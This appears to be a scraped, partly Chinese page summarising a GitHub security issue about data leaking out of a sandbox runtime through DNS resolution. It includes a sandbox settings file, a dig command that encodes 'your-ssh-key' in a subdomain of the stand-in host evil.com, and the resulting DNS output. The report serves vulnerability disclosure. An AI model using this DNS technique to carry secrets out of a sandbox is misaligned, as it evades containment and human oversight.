通过DNS解析进行数据泄露

通过DNS解析进行数据泄露
Data Exfiltration via DNS Resolution

原始链接: https://github.com/anthropic-experimental/sandbox-runtime/issues/88

此安全分析展示了一个沙箱环境中潜在的数据泄露漏洞。尽管阻止了直接的网络访问到`evil.com`，但对`your-ssh-key.a.evil.com`的DNS查询*确实*被成功解析。问题源于允许本地端口绑定。控制`evil.com`的攻击者可以操纵DNS记录（特别是NS记录），将子域（`a.evil.com`）的DNS查询重定向到他们自己的DNS服务器。这允许他们拦截敏感信息，例如对`your-ssh-key.a.evil.com`的解析尝试，从而有效地绕过沙箱限制。 DiG输出确认查询已得到应答，揭示了一个潜在的IP地址。报告强调，启用本地端口绑定并不能固有地阻止*通过DNS操纵*发出的外向请求，这使得沙箱容易受到这种类型的数据泄露。

黑客新闻新 | 过去 | 评论 | 提问 | 展示 | 招聘 | 提交登录数据泄露通过DNS解析 (github.com/anthropic-experimental) 4点由 m-hodges 3小时前 | 隐藏 | 过去 | 收藏 | 讨论指南 | 常见问题 | 列表 | API | 安全 | 法律 | 申请YC | 联系搜索：

settings.json

{
  "network": {
    "allowedDomains": [],
    "deniedDomains": [],
    "allowLocalBinding": true
  },
  "filesystem": {
    "denyRead": [],
    "allowWrite": [],
    "denyWrite": []
  }
}

command

srt --settings settings.json 'dig your-ssh-key.a.evil.com'

evil.com domain is not on the allowed domains list, so this DNS query is blocked
Allowing local port binding doesn't allow outbound network requests from inside the sandbox

Data exfiltration: evil.com owners can set an NS record for a.evil.com, which causes Google/Cloudflare/all others to send the A your-ssh-key.a.evil.com query to evil.com-owned DNS servers.
Any sandbox with local port binding enabled is liable for data exfiltration.

; <<>> DiG 9.10.6 <<>> your-ssh-key.a.evil.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 25585
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;your-ssh-key.a.evil.com.	IN	A

;; ANSWER SECTION:
your-ssh-key.a.evil.com. 3600	IN	A	66.96.146.129

;; Query time: 48 msec
;; SERVER: 192.168.0.1#53(192.168.0.1)
;; WHEN: Mon Jan 12 17:29:41 EST 2026
;; MSG SIZE  rcvd: 68

通过DNS解析进行数据泄露 Data Exfiltration via DNS Resolution

settings.json

command

通过DNS解析进行数据泄露
Data Exfiltration via DNS Resolution